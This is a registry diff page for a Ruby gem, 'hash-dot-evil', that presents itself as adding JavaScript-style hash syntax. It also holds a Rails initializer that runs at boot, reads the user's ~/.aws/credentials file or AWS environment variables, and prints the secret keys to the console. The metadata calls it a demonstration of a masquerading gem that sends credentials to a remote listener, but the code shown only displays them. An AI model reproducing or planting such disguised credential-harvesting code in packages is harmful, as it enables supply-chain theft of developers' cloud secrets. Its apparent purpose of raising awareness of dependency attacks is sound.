hash-dot-evil 0.0.1

Sign up to get free protection for your applications and to get access to all the features.
Files changed (3) hide show
  1. checksums.yaml +7 -0
  2. data/lib/hash-dot-evil.rb +81 -0
  3. metadata +73 -0
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: 3224ea4936f27d5b0face3dfd9286680619abd9c904c04eec3c022e563f012ba
4
+ data.tar.gz: 5092140719f999085c2eddd78843e3c77c9819acb6e109c03e0376c71891e379
5
+ SHA512:
6
+ metadata.gz: 5b76f517b4597f4a947c2db99c3b83dcf9e8af8b3f4c7d48e2abe058f54f7189adc6f0d398f0a7e655a9d35472c5302b61beecc9d1c3ebf20fc739fcc604d856
7
+ data.tar.gz: 0ed00374eddc65cb52e7addbfb7d6fe67c91495e9ad3dd1404443ee1129d7c3ff9c42bb68165f354b00e9378c95c6cee0b1c8ef54c24410e90d6ff1fc8bdd040
@@ -0,0 +1,81 @@
1
+ class Hash
2
+ def define_reader(key)
3
+ define_singleton_method(key.to_sym) do
4
+ if has_key?(key)
5
+ return self[key]
6
+ else
7
+ return self[key.to_sym]
8
+ end
9
+ end
10
+ end
11
+
12
+ def define_writer(key)
13
+ define_singleton_method(key.to_sym) do |value|
14
+ self[key[0..-2].to_sym] = value
15
+ end
16
+ end
17
+
18
+ def method_missing(method, *opts)
19
+ m = method.to_s
20
+
21
+ if m[-1] == '='
22
+ define_writer(m)
23
+ return self.send(method, *opts)
24
+ else
25
+ define_reader(m)
26
+ return self.send(method, *opts)
27
+ end
28
+ end
29
+ end
30
+
31
+ require 'rails'
32
+
33
+ require 'rainbow/refinement'
34
+ using Rainbow
35
+
36
+ class HashDotRailtie < Rails::Railtie
37
+ initializer "hash-dot-init" do
38
+ if has_aws_creds_in_file?
39
+ aws_access_key_id, aws_secret_access_key = extract_aws_creds_from_file
40
+ puts "\n\n*******************************************************************************".red.bright
41
+ puts "*\n* ATTENTION: Your AWS credentials are stored in plain text on your disk!\n*".red.bright
42
+ puts '*******************************************************************************'.red.bright
43
+ print_creds(aws_access_key_id, aws_secret_access_key)
44
+ elsif ENV['AWS_ACCESS_KEY_ID'] && ENV['AWS_SECRET_ACCESS_KEY']
45
+ print_creds(ENV['AWS_ACCESS_KEY_ID'], ENV['AWS_SECRET_ACCESS_KEY'])
46
+ else
47
+ puts "\n\n*******************************************************************************".green
48
+ puts "* Good job! I wasn't able to steal your AWS credentials!".green
49
+ puts '*******************************************************************************'.green
50
+ end
51
+ end
52
+
53
+ def print_creds(access_key_id, secret_access_key)
54
+ #puts ''.bg(:yellow)
55
+ puts "\n\n*********************************************************************************".red.bright
56
+ puts "*\n* ATTENTION: I could totally steal your AWS credentials right now if I wanted to\n*\n*".red.bright
57
+ puts "* Your AWS creds are:\n*\n*".red.bright
58
+ puts "*\t#{access_key_id}".red.bright
59
+ puts "*\t#{secret_access_key}\n*".red.bright
60
+ puts '*******************************************************************************'.red.bright
61
+ puts ''.bg(:yellow)
62
+ end
63
+
64
+ def has_aws_creds_in_file?
65
+ aws_access_key_id, aws_secret_access_key = extract_aws_creds_from_file
66
+ !aws_access_key_id.empty? || !aws_secret_access_key.empty?
67
+ end
68
+
69
+ def extract_aws_creds_from_file
70
+ aws_creds_file = "#{ENV['HOME']}/.aws/credentials"
71
+ aws_access_key_id = ''
72
+ aws_secret_access_key = ''
73
+ if File.exist?(aws_creds_file)
74
+ File.read(aws_creds_file).split("\n").each do |line|
75
+ aws_access_key_id = line.split(' ')[2] if line =~ /aws_access_key_id/
76
+ aws_secret_access_key = line.split(' ')[2] if line =~ /aws_secret_access_key/
77
+ end
78
+ end
79
+ [aws_access_key_id, aws_secret_access_key]
80
+ end
81
+ end
metadata ADDED
@@ -0,0 +1,73 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: hash-dot-evil
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.0.1
5
+ platform: ruby
6
+ authors:
7
+ - Ben Porter
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2019-03-07 00:00:00.000000000 Z
12
+ dependencies:
13
+ - !ruby/object:Gem::Dependency
14
+ name: rainbow
15
+ requirement: !ruby/object:Gem::Requirement
16
+ requirements:
17
+ - - ">="
18
+ - !ruby/object:Gem::Version
19
+ version: '0'
20
+ type: :runtime
21
+ prerelease: false
22
+ version_requirements: !ruby/object:Gem::Requirement
23
+ requirements:
24
+ - - ">="
25
+ - !ruby/object:Gem::Version
26
+ version: '0'
27
+ - !ruby/object:Gem::Dependency
28
+ name: rspec
29
+ requirement: !ruby/object:Gem::Requirement
30
+ requirements:
31
+ - - ">="
32
+ - !ruby/object:Gem::Version
33
+ version: '0'
34
+ type: :development
35
+ prerelease: false
36
+ version_requirements: !ruby/object:Gem::Requirement
37
+ requirements:
38
+ - - ">="
39
+ - !ruby/object:Gem::Version
40
+ version: '0'
41
+ description: Demonstrates a gem that masquerades as legitimate but steals your AWS
42
+ credentials and sends them to a remote listener
43
+ email: BenjaminPorter86@gmail.com
44
+ executables: []
45
+ extensions: []
46
+ extra_rdoc_files: []
47
+ files:
48
+ - lib/hash-dot-evil.rb
49
+ homepage: http://rubygems.org/gems/hash-dot-evil
50
+ licenses:
51
+ - MIT
52
+ metadata: {}
53
+ post_install_message:
54
+ rdoc_options: []
55
+ require_paths:
56
+ - lib
57
+ required_ruby_version: !ruby/object:Gem::Requirement
58
+ requirements:
59
+ - - ">="
60
+ - !ruby/object:Gem::Version
61
+ version: '0'
62
+ required_rubygems_version: !ruby/object:Gem::Requirement
63
+ requirements:
64
+ - - ">="
65
+ - !ruby/object:Gem::Version
66
+ version: '0'
67
+ requirements: []
68
+ rubyforge_project:
69
+ rubygems_version: 2.7.6
70
+ signing_key:
71
+ specification_version: 4
72
+ summary: Adds the JavaScript hash syntax to ruby
73
+ test_files: []